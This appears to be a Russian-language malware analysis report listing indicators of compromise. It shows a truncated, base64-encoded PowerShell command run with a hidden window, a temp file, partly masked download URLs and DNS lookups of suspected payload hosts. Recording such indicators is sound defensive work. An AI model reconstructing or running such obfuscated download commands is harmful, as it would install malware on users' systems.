Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -en JABRAGsAeQBfAHoAYwByAD0AKAAnAE8AagAnACsAKAAnAGIAYQAnACsAJwA0ADQAJwApACsAJwAxACcAKQA7ACYAKAAnAG4AZQB3ACcAKwAnAC0AaQB0AGUAbQAnACkAIAAkAGUAbgBWADoAdQBzAEUAUgBwAHIAbwBmAEkATABFAFwAaQB4AF8AVQAwA...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1536
- %TEMP%\1077654.cvr
- http://re######-demo-website.com/discussion/qWWf8FS/
- http://pl#######audesemcarencia.com/erros/JHoq/
- DNS ASK re######-demo-website.com
- DNS ASK mo###umps.com
- DNS ASK tw####rprint.com
- DNS ASK si###ations.org
- DNS ASK pl#######audesemcarencia.com
- DNS ASK vi####achina.com
- DNS ASK ce#####ltural.com.br
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -en JABRAGsAeQBfAHoAYwByAD0AKAAnAE8AagAnACsAKAAnAGIAYQAnACsAJwA0ADQAJwApACsAJwAxACcAKQA7ACYAKAAnAG4AZQB3ACcAKwAnAC0AaQB0AGUAbQAnACkAIAAkAGUAbgBWADoAdQBzAEUAUgBwAHIAbwBmAEkATABFAFwAaQB4AF8AVQAwA...' (со скрытым окном)